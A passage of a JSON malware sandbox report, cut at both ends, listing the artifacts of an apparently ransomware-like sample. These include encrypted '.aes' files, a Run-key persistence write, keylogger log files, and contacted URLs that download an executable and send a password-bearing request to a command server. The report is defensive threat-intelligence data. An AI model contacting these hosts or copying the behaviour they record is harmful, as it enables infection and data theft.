[], "norm_filename": "c:\\users\\kft6utqw\\desktop\\1zxeg6xm\\cnh\\y48xz.pdf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Desktop\\1ZxEG6XM\\cNh\\y48XZ.pdf.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\desktop\\1zxeg6xm\\cnh\\y48xz.pdf.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\"C:\\Users\\kFT6uTQW\\AppData\\Roaminghhfhqi2h.wln.bat\"", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\desktop\\\"c:\\users\\kft6utqw\\appdata\\roaminghhfhqi2h.wln.bat\"", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [ { "ip_address": "91.231.140.161", "type": "ip_address_artifact", "version": 1 }, { "ip_address": "176.58.123.25", "type": "ip_address_artifact", "version": 1 }, { "ip_address": "82.221.129.19", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [ { "mutex_name": "Local\\!PrivacIE!SharedMemory!Mutex", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "Global\\.net clr networking", "operations": [ "access", "delete" ], "type": "mutex_artifact", "version": 1 } ], "registry": [ { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ARIA_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ARIA_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_DISPPARAMS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_DISPPARAMS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_PRIVATE_FONT_SETTING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_PRIVATE_FONT_SETTING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_SHOW_HIDE_EVENTS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_SHOW_HIDE_EVENTS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DISPLAY_NODE_ADVISE_KB833311", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DISPLAY_NODE_ADVISE_KB833311", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ALLOW_EXPANDURI_BYPASS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ALLOW_EXPANDURI_BYPASS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DATABINDING_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DATABINDING_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENFORCE_BSTR", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENFORCE_BSTR", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CLEANUP_AT_FLS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CLEANUP_AT_FLS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DOCUMENT_COMPATIBLE_MODE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DOCUMENT_COMPATIBLE_MODE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_WEBOC_DOCUMENT_ZOOM", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_WEBOC_DOCUMENT_ZOOM", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\PageSetup", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_XSSFILTER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_XSSFILTER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MSHTML_AUTOLOAD_IEFRAME", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MSHTML_AUTOLOAD_IEFRAME", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Script\\Features", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\COM3", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ACTIVEX_INACTIVATE_MODE_REMOVAL_REVERT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ACTIVEX_INACTIVATE_MODE_REMOVAL_REVERT", "type": "registry_artifact", "version": 1 }, { "operations": [ "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\ODiag", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\ODiag\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OSession", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OSession\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read", "write" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read", "write" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\AESxWin", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time\\Dynamic DST", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [ { "operations": "GET", "type": "url_artifact", "url": "w-szczecin.pl/img2/s50.exe", "version": 1 }, { "operations": "GET", "type": "url_artifact", "url": "beer-ranking.pl/gen/", "version": 1 }, { "operations": "GET", "type": "url_artifact", "url": "beer-ranking.pl/login/post.php?IP=87.142.159.51&ID=0b75c6dd-d172-492e-b7be-2c05de30e808&Data=17-10-2017%2001:10:26&Haslo=46sDISwJJE10uqPP7rx!K_*@KX(YL2yASBN@3SDx6)7!_HL7IR23RZY!FUT1H2@9*H40@r71qZWq_r7ISTutC2_RHSDYFxRCOG!JI3tIL0IL1A4D38H)UGQ!93Ty@wJIMF14r5xNOO8AZXNLO4Ktu@_(YTwRZO@u4W85K_D9Owtx2QRBF*EJ7DGO6LqP@@UYQNN!M15@68qSIS3YOrqFFH4w35UYZzFAW3urN9*E1*6tOT1(U2D9tq)65TNO23ZIQ3K)XGCIDsL2XxZB9!u**t32XBBJ(92OXxMDNZU02", "version": 1 }, { "operations": "GET", "type": "url_artifact", "url": "beer-ranking.pl/save.txt", "version": 1 } ], "version": 1 }, "extracted_files": [ { "archive_path": "extracted_files/55b6e9b15003770842395be3e0d55ac477537ddd", "file_type": "created_file", "id": "file_3", "md5_hash": "36040c85f7aa54e66fd6ed5e7bf298dd", "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\nvss.exe", "sha1_hash": "55b6e9b15003770842395be3e0d55ac477537ddd", "sha256_hash": "aac8a8f087e8acfa9acd6e40ca4ee5b5c42f82e4e4f4633268b0bb91cf76de1d", "size": 402944, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/064cf6477e359f9084098da05bc974b1147f16f4", "file_type": "created_file", "id": "file_5", "md5_hash": "a1fb0cacc1cee630641b508b2086b7a9", "norm_filename": "c:\\programdata\\keyboard\\17102017_012722.log", "sha1_hash": "064cf6477e359f9084098da05bc974b1147f16f4", "sha256_hash": "6426309787950c45434ce8d35229ff32437868cc6c437c397625061cb788ec81", "size": 37, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/8e22e62dc5916fd9001262d356461644de9e1c48", "file_type": "created_file", "id": "file_6", "md5_hash": "2aed3869dc90e2c688b00a7f76050ece", "norm_filename": "c:\\programdata\\keyboard\\17102017_012722.log", "sha1_hash": "8e22e62dc5916fd9001262d356461644de9e1c48", "sha256_hash": "a25b97ccc667cf1fa3df95fd22c16f8f20c7671ef5e29ffc7424ee3f08124538", "size": 85, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/8ef4b8b0fe397f596922aae624c4c61cea02ac35", "file_type": "created_file", "id": "file_7", "md5_hash": "b637d1056fb3a64637527b0de3c2722a", "norm_filename": "c:\\programdata\\keyboard\\17102017_012722.log", "sha1_hash": "8ef4b8b0fe397f596922aae624c4c61cea02ac35", "sha256_hash": "2cb8d99c2bf5b5b73e03e8690a5e981f547e4e1aad2aacae16f9e03124537c38", "size": 489, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_8", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\cab8999.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_9", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\tar899a.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_12", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\cab8a08.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_13", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\tar8a09.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_17", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\cab8aa6.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_18", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\tar8aa7.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_161", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\-vero sqdwv.avi.aes", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/e1b8114caa3a6b173c2e04e356a5065e7b2ca968", "file_type": "created_file", "id": "file_10", "md5_hash": "26763abb95381e4931c194e34023c33a", "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\cab8999.tmp", "sha1_hash": "e1b8114caa3a6b173c2e04e356a5065e7b2ca968", "sha256_hash": "49f2686e30a59fabf11db1234c377497cf09e941ff50a0346854d087e8b08587", "size": 52967, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/e1b8114caa3a6b173c2e04e356a5065e7b2ca968", "file_type": "created_file", "id": "file_14", "md5_hash": "26763abb95381e4931c194e34023c33a", "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\cab8a08.tmp", "sha1_hash": "e1b8114caa3a6b173c2e04e356a5065e7b2ca968", "sha256_hash": "49f2686e30a59fabf11db1234c377497cf09e941ff50a0346854d087e8b08587", "size": 52967, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/f2295d85679189d4fc1aac7c761be81447299ec5", "file_type": "created_file", "id": "file_11", "md5_hash": "0dab7711a89d642ffe6ea216d92e56c1", "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\tar899a.tmp", "sha1_hash": "f2295d85679189d4fc1aac7c761be81447299ec5", "sha256_hash": "163a6d7aaf9374ae4f1b4ee744a906b68da772aaa22095b4ecae709fb6d889e5", "size": 126167, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/f2295d85679189d4fc1aac7c761be81447299ec5", "file_type": "created_file", "id": "file_15", "md5_hash": "0dab7711a89d642ffe6ea216d92e56c1", "norm_filename": 